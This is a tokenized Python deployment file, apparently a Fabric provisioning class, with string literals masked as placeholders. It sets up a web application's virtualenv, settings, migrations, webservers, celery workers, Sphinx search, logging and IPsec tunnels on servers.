* fab_quiet ) : <EOL> run ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % ( VENV_PTH , PIP_BIN , GITHUB_TERRARIUM ) <EOL> ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> run ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % ( VENV_PTH , PIP_BIN ) <EOL> ) <EOL> if env . get ( '<STR_LIT>' , False ) : <EOL> self . _configure_newrelic ( ) <EOL> def _replace_text_in_files ( self , paths , search , replace ) : <EOL> sudo ( "<STR_LIT>" % ( search , replace , '<STR_LIT:U+0020>' . 
join ( paths ) ) ) <EOL> def _do_set_hostname ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> hostname = env . hostname <EOL> logger . info ( '<STR_LIT>' , hostname ) <EOL> with hide ( * fab_output_hides ) : <EOL> self . _append_text_to_line_in_files ( <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % hostname , <EOL> ) <EOL> sudo ( '<STR_LIT>' % hostname ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def do_update ( self , node_role_map , node_roles , first_run = False ) : <EOL> """<STR_LIT>""" <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" , env . host_string ) <EOL> for ipsec_name , _ in env . ipsec_confs . items ( ) : <EOL> require ( '<STR_LIT>' % ipsec_name ) <EOL> if first_run : <EOL> self . do_first_launch_config ( ) <EOL> self . _stop_celery ( ) <EOL> self . _update_cache_settings ( node_role_map [ '<STR_LIT>' ] [ '<STR_LIT:all>' ] ) <EOL> self . _update_sphinx_settings ( <EOL> node_role_map [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> node_roles , <EOL> ) <EOL> self . _update_celery_backend_settings ( <EOL> node_role_map [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> ldap_api_nodes = node_role_map [ '<STR_LIT>' ] <EOL> self . _update_ldap_api_endpoint_settings ( <EOL> all_ldap_api_nodes = ldap_api_nodes [ '<STR_LIT:all>' ] , <EOL> same_az_ldap_api_nodes = ldap_api_nodes [ '<STR_LIT>' ] , <EOL> node_roles = node_roles , <EOL> ) <EOL> self . _update_celery_ldap_settings ( node_roles ) <EOL> env . project_root_src = '<STR_LIT>' % env <EOL> source_dir = env . 
project_root_src <EOL> current_source_dir = None <EOL> if not first_run : <EOL> current_source_dir = env . project_root <EOL> with hide ( * fab_output_hides ) : <EOL> push_source ( <EOL> new_source_dir = source_dir , <EOL> current_source_dir = current_source_dir , <EOL> chown = F_CHOWN , <EOL> chmod = "<STR_LIT>" , <EOL> ) <EOL> self . _make_media_readable ( source_dir ) <EOL> self . _configure_settings_local ( <EOL> source_dir , <EOL> env . pstat_settings , <EOL> chown = F_CHOWN , <EOL> ) <EOL> self . _configure_settings_target ( <EOL> source_dir , <EOL> env . settings_target , <EOL> chown = F_CHOWN , <EOL> ) <EOL> self . configure_terrarium ( source_dir = source_dir , user = FILE_OWNER ) <EOL> self . _activate_new_source ( <EOL> source_dir , <EOL> [ ACTIVE_SOURCE_SYMLINK , env . project_root ] , <EOL> ) <EOL> self . _run_db_migrations ( user = FILE_OWNER ) <EOL> self . _link_storage_dirs ( ) <EOL> self . _configure_webservers ( node_roles ) <EOL> building_search_index = self . _build_search_index ( ) <EOL> self . _create_media_folder ( ) <EOL> self . _collect_static_media ( ) <EOL> self . _create_500_page ( ) <EOL> self . _restart_webservers ( ) <EOL> self . _configure_celery ( node_roles ) <EOL> self . _update_supervisord ( ) <EOL> self . _configure_calabar ( ) <EOL> self . _configure_ipsec ( ) <EOL> self . _start_celery ( ) <EOL> self . _configure_loggly ( ) <EOL> self . _configure_pstat_cron_jobs ( ) <EOL> self . _configure_email_sending ( ) <EOL> if first_run : <EOL> self . _sync_s3_media ( ) <EOL> if building_search_index : <EOL> self . _wait_for_search_indexing ( ) <EOL> self . _ensure_sphinx_running ( ) <EOL> self . _configure_sphinx_cron ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _activate_new_source ( self , source_dir , active_version_symlinks ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> for symlink in active_version_symlinks : <EOL> logger . info ( "<STR_LIT>" , symlink ) <EOL> symlink_dir , _ = os . path . 
split ( symlink ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % symlink_dir ) <EOL> sudo ( '<STR_LIT>' % symlink ) <EOL> sudo ( '<STR_LIT>' % ( source_dir , symlink ) ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % source_dir ) <EOL> def configure_terrarium ( self , source_dir , user ) : <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> venv_parent_dir , _ = os . path . split ( VENV_PTH ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % ( user , venv_parent_dir ) ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % VENV_PTH ) <EOL> pstat = '<STR_LIT>' % source_dir <EOL> args = { <EOL> '<STR_LIT>' : PYTHON_BIN , <EOL> '<STR_LIT>' : '<STR_LIT>' % VENV_PTH , <EOL> '<STR_LIT>' : VENV_PTH , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' % ( pstat , req ) <EOL> for req in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ] ) , <EOL> } <EOL> args . update ( env ) <EOL> with hide ( * fab_output_hides ) : <EOL> result = sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % args , <EOL> user = user , <EOL> ) <EOL> if result . failed : <EOL> logger . critical ( <EOL> '<STR_LIT>' , <EOL> result . return_code , <EOL> ) <EOL> logger . critical ( '<STR_LIT>' , result ) <EOL> exit ( result . return_code ) <EOL> pstat_pth = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % source_dir <EOL> ) <EOL> pstat_pth_link = '<STR_LIT>' % VENV_PTH <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % ( pstat_pth , pstat_pth_link ) , user = user ) <EOL> sudo ( '<STR_LIT>' % VENV_PTH ) <EOL> def is_local_db ( self ) : <EOL> if env . 
db_host == '<STR_LIT:localhost>' : <EOL> return True <EOL> return False <EOL> def _sync_s3_media ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> if env . get ( '<STR_LIT>' , False ) : <EOL> with cd ( env . project_root ) : <EOL> cmd = [ <EOL> '<STR_LIT>' % PYTHON_BIN , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> '<STR_LIT:&>' , <EOL> ] <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> run ( '<STR_LIT>' % "<STR_LIT:U+0020>" . join ( cmd ) ) <EOL> def _append_text_to_line_in_files ( <EOL> self , path , line_matching , text_to_append ) : <EOL> sudo ( <EOL> '<STR_LIT>' % ( <EOL> line_matching , text_to_append , '<STR_LIT:U+0020>' . join ( path ) <EOL> ) <EOL> ) <EOL> def _configure_newrelic ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def _create_500_page ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with cd ( '<STR_LIT>' % env ) : <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( <EOL> '<STR_LIT>' % PYTHON_BIN , <EOL> user = '<STR_LIT>' ) <EOL> def _restart_webservers ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> self . _ensure_uwsgi_up ( ) <EOL> def _create_media_folder ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> merged_dir = '<STR_LIT>' % env . project_root_src <EOL> sudo ( '<STR_LIT>' % merged_dir ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , merged_dir ) ) <EOL> def _collect_static_media ( self ) : <EOL> logger . 
info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> with cd ( '<STR_LIT>' % env ) : <EOL> collect = "<STR_LIT>" <EOL> sudo ( collect % PYTHON_BIN , user = '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , env . project_root ) ) <EOL> def _configure_webservers ( self , node_roles ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> context = { <EOL> '<STR_LIT>' : env . project_root , <EOL> '<STR_LIT>' : env . pstat_url , <EOL> } <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context , <EOL> use_sudo = True <EOL> ) <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context , <EOL> use_sudo = True <EOL> ) <EOL> newrelic_conf = self . conf . get ( '<STR_LIT>' , { } ) <EOL> new_relic_environment = newrelic_conf . get ( '<STR_LIT>' , None ) <EOL> context = { <EOL> '<STR_LIT>' : new_relic_environment , <EOL> } <EOL> changed = upload_template_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_jinja = True , <EOL> context = context , <EOL> ) <EOL> if changed : <EOL> self . modified_services . append ( SUPERVISORD ) <EOL> files = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , '<STR_LIT:U+0020>' . join ( files ) ) ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> context = { <EOL> '<STR_LIT>' : env . project_root , <EOL> '<STR_LIT>' : env . pstat_url , <EOL> } <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % env . pstat_url , <EOL> context , <EOL> use_sudo = True , <EOL> ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % env <EOL> ) <EOL> def _make_media_readable ( self , source_dir ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> site_media = os . path . 
join ( source_dir , '<STR_LIT>' ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % site_media ) <EOL> def _configure_settings_local ( self , source_dir , settings_dict , chown = None ) : <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> settings_dict [ '<STR_LIT>' ] = env . db_name <EOL> settings_dict [ '<STR_LIT>' ] = env . db_user <EOL> settings_dict [ '<STR_LIT>' ] = env . db_host <EOL> settings_dict [ '<STR_LIT>' ] = env . db_password <EOL> settings_dict [ '<STR_LIT>' ] = env . enable_periodic_tasks <EOL> target = '<STR_LIT>' % source_dir <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> target , <EOL> context = settings_dict , <EOL> use_jinja = True , <EOL> use_sudo = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> ) <EOL> if chown : <EOL> sudo ( '<STR_LIT>' % ( chown , target ) ) <EOL> def _configure_settings_target ( <EOL> self , source_dir , settings_target , chown = None , <EOL> ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> target = '<STR_LIT>' % source_dir <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> target , <EOL> context = { '<STR_LIT>' : settings_target } , <EOL> use_jinja = True , <EOL> use_sudo = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> ) <EOL> if chown : <EOL> sudo ( '<STR_LIT>' % ( chown , target ) ) <EOL> def _run_db_migrations ( self , user ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with cd ( '<STR_LIT>' % env ) : <EOL> result = sudo ( <EOL> '<STR_LIT>' % PYTHON_BIN , <EOL> user = user ) <EOL> if result . failed : <EOL> logger . critical ( result ) <EOL> logger . 
critical ( "<STR_LIT>" ) <EOL> exit ( <NUM_LIT:1> ) <EOL> def _create_db_and_user ( self ) : <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> context = { <EOL> '<STR_LIT>' : env . db_user , <EOL> '<STR_LIT:password>' : env . db_password , <EOL> '<STR_LIT>' : env . db_name , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> context = context , <EOL> use_jinja = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> ) <EOL> start_mysql_tpl = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> start_mysql_args = ( <EOL> env . db_master_user , <EOL> env . db_master_password , <EOL> env . db_host , <EOL> ) <EOL> start_mysql = start_mysql_tpl % start_mysql_args <EOL> with hide ( * fab_quiet ) : <EOL> run ( "<STR_LIT>" % ( start_mysql , '<STR_LIT>' ) , shell = True ) <EOL> def _configure_sphinx ( self ) : <EOL> """<STR_LIT>""" <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> context = { <EOL> '<STR_LIT>' : env . db_user , <EOL> '<STR_LIT>' : env . db_password , <EOL> '<STR_LIT>' : env . db_name , <EOL> '<STR_LIT>' : env . db_host , <EOL> '<STR_LIT>' : env . sphinx_counter , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context = context , <EOL> use_jinja = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> script_destination = ( <EOL> '<STR_LIT>' % env . db_name <EOL> ) <EOL> with hide ( * fab_output_hides ) : <EOL> logger . 
info ( "<STR_LIT>" , script_destination ) <EOL> put ( <EOL> '<STR_LIT>' , <EOL> script_destination , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_sudo = True , <EOL> ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , script_destination ) ) <EOL> def _update_sphinx_settings ( self , sphinx_nodes , node_roles ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> assert len ( sphinx_nodes ) == <NUM_LIT:1> <EOL> node = sphinx_nodes [ <NUM_LIT:0> ] <EOL> env . pstat_settings [ '<STR_LIT>' ] = node . boto_instance . private_dns_name <EOL> env . pstat_settings [ '<STR_LIT>' ] = False <EOL> if '<STR_LIT>' in node_roles : <EOL> env . pstat_settings [ '<STR_LIT>' ] = True <EOL> def _update_celery_backend_settings ( self , celery_backend_nodes ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> assert len ( celery_backend_nodes ) == <NUM_LIT:1> <EOL> node = celery_backend_nodes [ <NUM_LIT:0> ] <EOL> env . pstat_settings [ '<STR_LIT>' ] = node . boto_instance . private_dns_name <EOL> def _update_ldap_api_endpoint_settings ( <EOL> self , all_ldap_api_nodes , same_az_ldap_api_nodes , node_roles , <EOL> ) : <EOL> env . pstat_settings [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in node_roles : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> same_az_first = BaseProvisioner . order_nodes_by_same_az ( <EOL> all_ldap_api_nodes , <EOL> same_az_ldap_api_nodes , <EOL> ) <EOL> for node in same_az_first : <EOL> api_endpoint = API_ENDPOINT % { <EOL> '<STR_LIT>' : node . boto_instance . private_dns_name , <EOL> } <EOL> env . pstat_settings [ '<STR_LIT>' ] . append ( <EOL> api_endpoint , <EOL> ) <EOL> def _update_celery_ldap_settings ( self , node_roles ) : <EOL> """<STR_LIT>""" <EOL> env . pstat_settings [ '<STR_LIT>' ] = False <EOL> env . enable_celery_ldap = False <EOL> if '<STR_LIT>' in node_roles : <EOL> logger . info ( "<STR_LIT>" ) <EOL> env . pstat_settings [ '<STR_LIT>' ] = True <EOL> env . enable_celery_ldap = True <EOL> return <EOL> logger . 
info ( "<STR_LIT>" ) <EOL> def _update_cache_settings ( self , memcached_nodes ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> assert len ( memcached_nodes ) > <NUM_LIT:0> <EOL> if memcached_nodes : <EOL> memcached_port = <NUM_LIT> <EOL> cache_str = '<STR_LIT>' <EOL> cache_instances = [ ] <EOL> for node in memcached_nodes : <EOL> cache_instances . append ( <EOL> "<STR_LIT>" % ( <EOL> node . boto_instance . private_dns_name , <EOL> memcached_port , <EOL> ) <EOL> ) <EOL> cache_str += '<STR_LIT:;>' . join ( cache_instances ) <EOL> env . pstat_settings [ '<STR_LIT>' ] = cache_str <EOL> def _link_storage_dirs ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> dirs = [ <EOL> ( name , '<STR_LIT>' % env + name ) <EOL> for name in LINKED_DIRS <EOL> ] <EOL> for name , link_name in dirs : <EOL> with hide ( * fab_output_hides ) : <EOL> storage_dir = os . path . join ( MEDIA_STORAGE_ROOT , name ) <EOL> sudo ( '<STR_LIT>' % storage_dir ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , storage_dir ) ) <EOL> sudo ( '<STR_LIT>' % storage_dir ) <EOL> sudo ( '<STR_LIT>' % ( storage_dir , link_name ) ) <EOL> def _build_search_index ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> check_files = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> needs_init = False <EOL> for check_f in check_files : <EOL> with hide ( * fab_quiet ) : <EOL> check_result = sudo ( '<STR_LIT>' % check_f ) <EOL> if check_result . failed : <EOL> needs_init = True <EOL> break <EOL> if not needs_init : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return False <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % F_CHOWN <EOL> ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> index_result = sudo_bg ( <EOL> '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> ) <EOL> if index_result . failed : <EOL> logger . 
critical ( <EOL> "<STR_LIT>" , <EOL> index_result , <EOL> ) <EOL> return True <EOL> def _wait_for_search_indexing ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> indexer_exists = True <EOL> while indexer_exists : <EOL> with hide ( * fab_quiet ) : <EOL> indexer_found = run ( '<STR_LIT>' ) <EOL> indexer_exists = indexer_found . succeeded <EOL> if indexer_exists : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> WAIT_TIME , <EOL> indexer_found , <EOL> ) <EOL> time . sleep ( WAIT_TIME ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _ensure_sphinx_running ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _is_running ( ) : <EOL> check_cmd = "<STR_LIT>" <EOL> with hide ( * fab_quiet ) : <EOL> check_result = sudo ( check_cmd ) <EOL> return check_result . return_code == <NUM_LIT:0> <EOL> def _start_sphinx ( stop_first = False ) : <EOL> start_cmd = "<STR_LIT>" <EOL> with hide ( * fab_output_hides ) : <EOL> if stop_first : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( start_cmd ) <EOL> wait_str = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> _start_sphinx ( stop_first = True ) <EOL> self . wait_for_condition ( <EOL> _is_running , <EOL> wait_str , <EOL> retry_action = _start_sphinx , <EOL> wait_seconds = WAIT_TIME , <EOL> prompt_cycles = <NUM_LIT:2> , <EOL> ) <EOL> def _configure_sphinx_cron ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> script_path = '<STR_LIT>' <EOL> cron_location = '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT>' : script_path , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> "<STR_LIT>" , <EOL> cron_location , <EOL> context , <EOL> use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % cron_location ) <EOL> def _needs_syslog_ng_restart ( self ) : <EOL> with hide ( * fab_quiet ) : <EOL> with hide ( '<STR_LIT>' ) : <EOL> result = sudo ( '<STR_LIT>' ) <EOL> if result . failed : <EOL> logger . 
info ( "<STR_LIT>" ) <EOL> return True <EOL> with hide ( '<STR_LIT>' ) : <EOL> changed_conf = sudo ( <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> shell = True , <EOL> ) <EOL> if changed_conf . return_code != <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return True <EOL> return False <EOL> def _configure_loggly ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> install_check = run ( '<STR_LIT>' , shell = True ) <EOL> if install_check . return_code != <NUM_LIT:0> : <EOL> sudo ( '<STR_LIT>' ) <EOL> context = env . loggly_inputs <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context , <EOL> use_sudo = True ) <EOL> if self . _needs_syslog_ng_restart ( ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> result = sudo ( '<STR_LIT>' ) <EOL> if result . failed : <EOL> logger . critical ( "<STR_LIT>" ) <EOL> logger . critical ( result ) <EOL> exit ( <NUM_LIT:1> ) <EOL> def _configure_calabar ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> tunnel_confs_dir = '<STR_LIT>' <EOL> configuration_changed = False <EOL> with hide ( * fab_output_hides ) : <EOL> changed = put_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> ) <EOL> if changed : <EOL> configuration_changed = True <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> with hide ( * fab_output_hides ) : <EOL> for dirpath , _ , filenames in os . walk ( tunnel_confs_dir ) : <EOL> for filename in filenames : <EOL> calabar_config_file = os . path . join ( dirpath , filename ) <EOL> changed = upload_template_changed ( <EOL> calabar_config_file , <EOL> '<STR_LIT>' , <EOL> context = env . calabar_conf_context , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> ) <EOL> if changed : <EOL> configuration_changed = True <EOL> if configuration_changed : <EOL> logger . 
info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def _stop_celery ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _start_celery ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _ensure_uwsgi_up ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _configure_celery ( self , node_roles ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> hostname = env . hostname <EOL> enable_periodic_tasks = env . enable_periodic_tasks <EOL> enable_celery_ldap = env . enable_celery_ldap <EOL> celery_conf = self . conf . get ( '<STR_LIT>' , { } ) <EOL> newrelic_conf = self . conf . get ( '<STR_LIT>' , { } ) <EOL> new_relic_environment = newrelic_conf . get ( '<STR_LIT>' , None ) <EOL> context = { <EOL> '<STR_LIT>' : new_relic_environment , <EOL> '<STR_LIT>' : hostname , <EOL> '<STR_LIT>' : enable_periodic_tasks , <EOL> '<STR_LIT>' : enable_celery_ldap , <EOL> '<STR_LIT>' : celery_conf , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> changed = upload_template_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_jinja = True , <EOL> context = context , <EOL> ) <EOL> if changed : <EOL> self . modified_services . append ( SUPERVISORD ) <EOL> def _update_supervisord ( self ) : <EOL> if SUPERVISORD not in self . modified_services : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _configure_ipsec ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> ipsec_confs = env . get ( '<STR_LIT>' ) <EOL> needs_restart = False <EOL> changed = self . 
_configure_ipsec_networking ( ) <EOL> needs_restart = needs_restart or changed <EOL> changed = self . _configure_ipsec_base ( ipsec_confs ) <EOL> needs_restart = needs_restart or changed <EOL> changed = self . _configure_ipsec_secrets ( ipsec_confs ) <EOL> needs_restart = needs_restart or changed <EOL> for ipsec_name , ipsec_conf in ipsec_confs . items ( ) : <EOL> changed = self . _configure_ipsec_site ( ipsec_name , ipsec_conf ) <EOL> needs_restart = needs_restart or changed <EOL> if needs_restart : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _configure_ipsec_networking ( self ) : <EOL> """<STR_LIT>""" <EOL> with hide ( * fab_output_hides ) : <EOL> changed = upload_template_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> if changed : <EOL> sudo ( '<STR_LIT>' ) <EOL> return changed <EOL> def _configure_ipsec_base ( self , ipsec_confs ) : <EOL> """<STR_LIT>""" <EOL> base_conf_tpl = '<STR_LIT>' <EOL> subnet_exclusions = [ ] <EOL> for conf in ipsec_confs . values ( ) : <EOL> subnet_exclusion = '<STR_LIT>' % conf [ '<STR_LIT>' ] <EOL> subnet_exclusions . append ( subnet_exclusion ) <EOL> excluded_subnets = '<STR_LIT:U+002C>' . join ( subnet_exclusions ) <EOL> with hide ( * fab_output_hides ) : <EOL> return upload_template_changed ( <EOL> base_conf_tpl , <EOL> '<STR_LIT>' , <EOL> context = { '<STR_LIT>' : excluded_subnets } , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> def _configure_ipsec_secrets ( self , ipsec_confs ) : <EOL> """<STR_LIT>""" <EOL> secrets_tpl = '<STR_LIT>' <EOL> secret_confs = [ ] <EOL> for name , conf in ipsec_confs . items ( ) : <EOL> secret_conf = { <EOL> '<STR_LIT>' : conf [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : env . get ( '<STR_LIT>' % name ) , <EOL> } <EOL> secret_confs . 
